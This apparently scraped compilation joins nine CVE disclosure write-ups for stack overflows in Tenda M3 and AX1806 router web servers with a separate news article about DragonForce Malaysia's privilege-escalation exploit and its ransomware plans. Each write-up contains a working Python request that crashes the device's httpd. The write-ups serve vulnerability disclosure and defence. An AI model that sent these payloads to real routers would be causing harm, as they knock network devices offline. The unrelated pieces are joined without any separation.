Tenda M3 V1.0.0.12 was discovered to contain a stack overflow via the function formSetCfm.

**Overview**

*   The device's official website: https://www.tenda.com.cn/product/M3.html
*   Firmware download website: https://www.tenda.com.cn/download/detail-3133.html

**Affected version**

V1.0.0.12(4856)

**Vulnerability details**

httpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the formSetCfm function, which can be accessed via the URL goform/setcfm

When the POST parameter funcname equals "save\_list\_data", the program will enter if branch at line 67. In this branch, program gets the POST parameter funcpara1 and funcpara2 then passed them to the function sub_45E28

In this function, program will enter the danger section when the length of funcpara2 is greater than 4. In this if branch, program copies funcpara1 to stack buffer by calling function sprintf without checking its length.

**PoC**

Poc of Denial of Service(DoS)

import requests

data \= {
    b"funcname": b"save\_list\_data",
    b"funcpara1": b'A'\*0x400,
    b"funcpara2": b'BBBBB'
    
}
cookies \= {
    b"user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/setcfm", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-32040: IoT-vuln/Tenda/M3/formSetCfm at main · d1tto/IoT-vuln

Tenda M3 V1.0.0.12 was discovered to contain a stack overflow via the listN parameter in the function fromDhcpListClient.

**Overview**

*   The device's official website: https://www.tenda.com.cn/product/M3.html
*   Firmware download website: https://www.tenda.com.cn/download/detail-3133.html

**Affected version**

V1.0.0.12(4856)

**Vulnerability details**

httpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the fromDhcpListClient function, which can be accessed via the URL goform/DhcpListClient

The POST parameter listN is concatenated. The program copies the POST argument without checking the length. We can set LISTEN equal to 1, the program will enter the red box, causing a stack overflow. Since the overflow overrides the LISTEN pointer variable, the atoi function will crash the program, causing a DOS attack in the second time looping.

**PoC**

Poc of Denial of Service(DoS)

import requests

data \= {
    b"LISTLEN": b"1",
    b"list1": b'A'\*0x300,
    b"page": b'A'
}
cookies \= {
    b"user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/DhcpListClient", data\=data, cookies\=cookies)
print(res.content)

I use qemu-arm to emulate it. To make it work, I patched the httpd binary:

*   In the main function, The ConnectCfm function didn't work properly, so I patched it to NOP.
    
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login.
    

In the main function, the program call the check_network function to get the IP address of the br0 interafce and use it as the listening address. So I create a iterface named br0 and configure its IP address to 127.0.0.1 .

CVE-2022-32039: IoT-vuln/Tenda/M3/fromDhcpListClient at main · d1tto/IoT-vuln

Tenda M3 V1.0.0.12 was discovered to contain a stack overflow via the function formSetAPCfg.

**Overview**

*   The device's official website: https://www.tenda.com.cn/product/M3.html
*   Firmware download website: https://www.tenda.com.cn/download/detail-3133.html

**Affected version**

V1.0.0.12(4856)

**Vulnerability details**

httpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the formSetAPCfg function, which can be accessed via the URL goform/setWtpData.

When the POST parameter op equals "bat", the program will enter if branch at line 139. The program then gets the POST parameters policy_type and radio_2g.

If policy_type is equal to wl_basic_policy, program will enter the if branch at line 180. There is a stack overflow in this if branch.

If policy_type is equal to neither wl_basic_policy nor qVLAN_policy, program will enter the if branch at line 199. There is also a stack overflow in this if branch.

**PoC**

Poc of Denial of Service(DoS)

import requests

data \= {
    b"op": b"bat",
    b"policy\_type": b"none",
    b"radio\_2g": b"A"\*0x400
}
cookies \= {
    b"user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/setWtpData", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-32037: IoT-vuln/Tenda/M3/formSetAPCfg at main · d1tto/IoT-vuln

Tenda M3 V1.0.0.12 was discovered to contain a stack overflow via the function formSetAccessCodeInfo.

**Overview**

*   The device's official website: https://www.tenda.com.cn/product/M3.html
*   Firmware download website: https://www.tenda.com.cn/download/detail-3133.html

**Affected version**

V1.0.0.12(4856)

**Vulnerability details**

httpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the formSetAccessCodeInfo function, which can be accessed via the URL goform/setAccessCodeData

formSetAccessCodeInfo function gets the POST parameter info and logo_pic_nameand copies to stack buffer without checking its length, causing a stack overflow vulnerability.

**PoC**

Poc of Denial of Service(DoS)

import requests

data \= {
    b"info": b'A'\*0x400,
    b"logo\_pic\_name": b'A'\*0x400
}
cookies \= {
    b"user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/setAccessCodeData", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-32043: IoT-vuln/Tenda/M3/formSetAccessCodeInfo at main · d1tto/IoT-vuln

Tenda M3 V1.0.0.12 was discovered to contain multiple stack overflow vulnerabilities via the ssidList, storeName, and trademark parameters in the function formSetStoreWeb.

**Overview**

*   The device's official website: https://www.tenda.com.cn/product/M3.html
*   Firmware download website: https://www.tenda.com.cn/download/detail-3133.html

**Affected version**

V1.0.0.12(4856)

**Vulnerability details**

httpd in directory /bin has a stack overflow vulnerability and a data segment overflow vulnerability. The vulnerability occurrs in the formSetStoreWeb function, which can be accessed via the URL goform/setStoreWeb

When the POST parameter action equals to "save", the program will enter if branch at line 103. In the if body, program copy POST parameter ssidList and storeName to global variable g_weixin_config without chekcing its length. It also copy POST parameter trademark to stack buffer v4 without chekcing its length.

**PoC**

Poc of Denial of Service(DoS)

import requests

data \= {
    b"action": b"save",
    b"ssidList": b'A'\*0x600,  \# .bss segment overflow
    b"storeName": b'A'\*0x600, \# .bss segment overflow
    b"trademark": b'A'\*0x1000, \# stack overflow
}
cookies \= {
    b"user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/setStoreWeb", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-32036: IoT-vuln/Tenda/M3/formSetStoreWeb at main · d1tto/IoT-vuln

Tenda M3 V1.0.0.12 was discovered to contain a stack overflow via the items parameter in the function formdelMasteraclist.

**Overview**

*   The device's official website: https://www.tenda.com.cn/product/M3.html
*   Firmware download website: https://www.tenda.com.cn/download/detail-3133.html

**Affected version**

V1.0.0.12(4856)

**Vulnerability details**

httpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the formdelMasteraclist function, which can be accessed via the URL goform/delAcListInfo.

function formdelMasteraclist gets the POST parameter items and passes it to function sub_53778 as the first argument.

This function splits the first argument with a , and then splits it into a buffer by calling sscanf function without checking its length.

**PoC**

Poc of Denial of Service(DoS)

import requests

data \= {
    b"items": b'A'\*0x400 + b':' + b'A'\*0x400 + b',',
}
cookies \= {
    b"user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/delAcListInfo", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-32034: IoT-vuln/Tenda/M3/formdelMasteraclist at main · d1tto/IoT-vuln

Tenda M3 V1.0.0.12 was discovered to contain a stack overflow via the function formMasterMng.

**Overview**

*   The device's official website: https://www.tenda.com.cn/product/M3.html
*   Firmware download website: https://www.tenda.com.cn/download/detail-3133.html

**Affected version**

V1.0.0.12(4856)

**Vulnerability details**

httpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the formMasterMng function, which can be accessed via the URL goform/getMasterMng

formMasterMng function gets the POST parameter url and copies to stack buffer without checking its length, causing a stack overflow vulnerability.

**PoC**

Poc of Denial of Service(DoS)

import requests

data \= {
    b"url": b'A'\*0x400,
}
cookies \= {
    b"user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/getMasterMng", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-32035: IoT-vuln/Tenda/M3/formMasterMng at main · d1tto/IoT-vuln

Tenda AX1806 v1.0.0.1 was discovered to contain a stack overflow via the function formSetVirtualSer.

**Overview**

*   The device's official website: https://www.tenda.com.cn/product/AX1806.html
*   Firmware download website: https://www.tenda.com.cn/download/detail-3306.html

**Affected version**

v1.0.0.1

**Vulnerability details**

tdhttpd in directory /bin has stack overflow vulnerability. The vulnerability occurrs in the formSetVirtualSer function, which can be accessed via the URL goform/SetVirtualServerCfg.

In function FUN_000631d0, the function sscanf is called to split it and copy to stack buffer without checking its length.

**PoC**

Poc of Denial of Service(DoS)

import requests

data \= {
    b"list": b'A'\*0x400+b'~'
}
res \= requests.post("http://127.0.0.1/goform/SetVirtualServerCfg", data\=data)
print(res.content)

CVE-2022-32033: IoT-vuln/Tenda/AX1806/formSetVirtualSer at main · d1tto/IoT-vuln

Tenda AX1806 v1.0.0.1 was discovered to contain a stack overflow via the list parameter in the function formSetQosBand.

**Overview**

*   The device's official website: https://www.tenda.com.cn/product/AX1806.html
*   Firmware download website: https://www.tenda.com.cn/download/detail-3306.html

**Affected version**

v1.0.0.1

**Vulnerability details**

tdhttpd in directory /bin has stack overflow vulnerability. The vulnerability occurrs in the formSetQosBand function, which can be accessed via the URL goform/SetNetControlList.

**PoC**

Poc of Denial of Service(DoS)

import requests

data \= {
    b"list": b'A'\*0x400+b'\\n'
}
res \= requests.post("http://127.0.0.1/goform/SetNetControlList", data\=data)
print(res.content)

CVE-2022-32030: IoT-vuln/Tenda/AX1806/formSetQosBand at main · d1tto/IoT-vuln

The hacktivist group is ramping up its activities and ready to assault governments and businesses with escalating capabilities.

The hacktivist group DragonForce Malaysia has released an exploit that allows Windows Server local privilege escalation (LPE) to grant access to local distribution router (LDR) capabilities. It also announced that it's adding ransomware attacks to its arsenal.  

The group posted a proof of concept (PoC) of the exploit on its Telegram channel on June 23, which was subsequently analyzed by CloudSEK this week. While there's no known CVE for the bug, the group claims that the exploit can be used to bypass authentication "remotely in one second" in order to access the LDR layer, which is used to interconnect local networks at various locations of an organization.

The group says it would be using the exploit in campaigns targeted at businesses operating in India, which falls directly within its wheelhouse. During the past three months, DragonForce Malaysia has launched several campaigns targeting numerous government agencies and organizations across the Middle East and Asia.

“DragonForce Malaysia is adding to a year that will long be remembered for geopolitical unrest," says Daniel Smith, head of research for Radware’s cyber threat intelligence division. "In combination with other hacktivists, the threat group has successfully filled the void left by Anonymous while remaining independent during the resurgence of hacktivists related to the Russian/Ukrainian war."

The most recent, dubbed "OpsPatuk" and launched in June, has already seen several government agencies and organizations across the country targeted by data leaks and denial-of-service attacks, with the number of defacements topping 100 websites.

“DragonForce Malaysia is expected to continue defining and launching new reactionary campaigns based on their social, political, and religious affiliations for the foreseeable future," Smith says. "The recent operations by DragonForce Malaysia ... should remind organizations worldwide that they should remain vigilant during these times and aware that threats exist outside the current cyber conflict in Eastern Europe.”

**Why LPE Should Be on the Patching Radar**

While not as flashy as remote code execution (RCE), LPE exploits provide a path from a normal user to SYSTEM, essentially the highest privilege level in the Windows environment. If exploited, LPE vulnerabilities not only allow an attacker a step in the door but also provide local admin privileges — and access to the most sensitive data on the network.

With this heightened level of access, attackers can make system modifications, recover credentials from stored services, or recover credentials from other users who are using or have authenticated to that system. Recovering other users' credentials can allow an attacker to impersonate those users, providing paths for lateral movement on a network.

With escalated privileges, an attacker can also perform admin tasks, execute malware, steal data, execute a backdoor to gain persistent access, and much more.

Darshit Ashara, principal threat researcher for CloudSEK, offers one sample attack scenario.

“The attacker from the team can easily exploit any simple Web application-based vulnerability to gain aninitial foothold and place a Web-based backdoor,” Ashara says. “Usually, the machine on which Web server is hosted will have user privilege. That is where the LPE exploit will enable the threat actor to gain higher privileges and compromise not only a single website but other websites hosted on the server.”

**LPE Exploits often Remain Unpatched**

Tim McGuffin, director of adversarial engineering at LARES Consulting, an information-security consulting firm, explains that most organizations wait to patch LPE exploits because they typically require initial access to the network or endpoint in the first place.

“A lot of effort is placed on the initial prevention of access, but the further you move into the attack chain, the lesser effort is placed on tactics like privilege escalation, lateral movement, and persistence,” he says. “These patches are typically prioritized and patched on a quarterly basis and do not use an emergency 'patch now' process.”

Nicole Hoffman, senior cyber threat intelligence analyst at Digital Shadows, notes that the importance of every vulnerability is different, whether it's LPE or RCE.

“Not all vulnerabilities can be exploited, meaning not every vulnerability requires immediate attention. It is a case-by-case basis,” she says. “Several LPE vulnerabilities have other dependencies, such as needing a username and password to carry out the attack. That's not impossible to obtain but requires a higher level of sophistication.”

Many organizations also create local admin accounts for individual users, so they can carry out everyday IT functions such as installing their own software on their own machines, Hoffman adds.

“If many users have local admin privileges, it is more difficult to detect malicious local admin actions in a network,” she says. “It would be easy for an attacker to blend into normal operations due to poor security practices that are widely used.”

Any time an exploit is released into the wild, she explains, it doesn't take long before cybercriminals with varying levels of sophistication take advantage and perform opportunistic attacks.

“An exploit takes out some of this legwork,” she notes. “It is realistically possible mass scanning is already taking place for this vulnerability.”

Hoffman adds that vertical privilege escalation requires more sophistication and is typically more in line with advanced persistent threat (APT) methodologies.

**DragonForce Plans Shift to Ransomware**

In a video and through social-media channels, the hacktivist group also announced its plans to start conducting mass ransomware attacks. Researchers say this could be an adjunct to its hacktivist activities rather than a departure.

“DragonForce mentioned carrying out widespread ransomware attacks leveraging the exploit they created,” Hoffman explains. “The WannaCry ransomware attack was a great example of how widespread ransomware attacks all at the same time are challenging if financial gain is the end goal.”

She also points out that it is not uncommon to see these announcements from cybercriminal threat groups, as it draws attention to the group.

From the perspective of McGuffin, however, the public announcement of a shift in tactics is “a curiosity,” especially for a hacktivist group.

“Their motives may be more around destruction and denial of service and less around making a profit like typical ransomware groups, but they may be using the funding to enhance their hacktivist capabilities or awareness of their cause,” he says.

Ashara agrees that DragonForce’s planned shift is worth highlighting, as the group’s motive is to cause as much of an impact as possible, boost their ideology, and spread their message.

“Hence, the group's motivation with the announcement of ransomware is not for financial cause but to cause damage,” he says. “We have seen similar wiper malwares in the past where they would use ransomware and pretend the motivation is financial, but the root motivation is damage.”

Tag

#dos